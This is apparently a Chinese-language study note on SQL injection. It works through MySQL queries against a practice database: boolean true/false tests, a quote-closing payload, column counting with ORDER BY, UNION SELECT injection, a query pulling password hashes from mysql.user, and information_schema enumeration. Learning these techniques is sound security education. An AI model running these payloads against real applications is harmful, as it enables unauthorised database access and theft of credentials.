学习笔记—Sql注入
Sql注入
当有不可信数据作为查询语句的一部分发送解释器时。攻击者的恶意数据欺骗解释器以执行计划外的命令或访问数据。
报错 每个报错都有相应的解释
show databases;
use jokedb;
show tables;
select * from users;
select * from users where id=1;
select user from users where id=1;
select user from users;
select * from users where id = 1 and 1=1;
select * from users where id = 1 and 1=2;
id=1’ and ‘1’='1 前后各缺一个与语句原本存在的单引号形成闭合
select * from users order by status;
select * from users order by ppp;
Sql报错注入判断:
select * from users order by 1;
select * from users order by 2;
select * from users order by 3;
select * from users order by 4;
select * from users order by 5;
select * from users order by 6;
select * from users order by 7;
select * from users order by 8;
select * from users order by 9;
select * from users order by 10;
联合查询:
select * from users order by 1,1,1,1,1,1;
select * from users where id = 1 union select 1,1,1,1,1,1,1;
select * from users where id = 1 union select 1,1,1,1,‘a’,1,1;
select version();
SELECT authentication_string FROM mysql.user;
select * from users where id = 1 union select 1,(SELECT authentication_string FROM mysql.user limit 0,1),1,1,1,version(),database();
select * from users where id = -1 or 1=1;
select table_schema from information_schema.tables;
select table_name from information_schema.tables where table_schema = ‘jokedb’;
**
了解更多请关注下列公众号: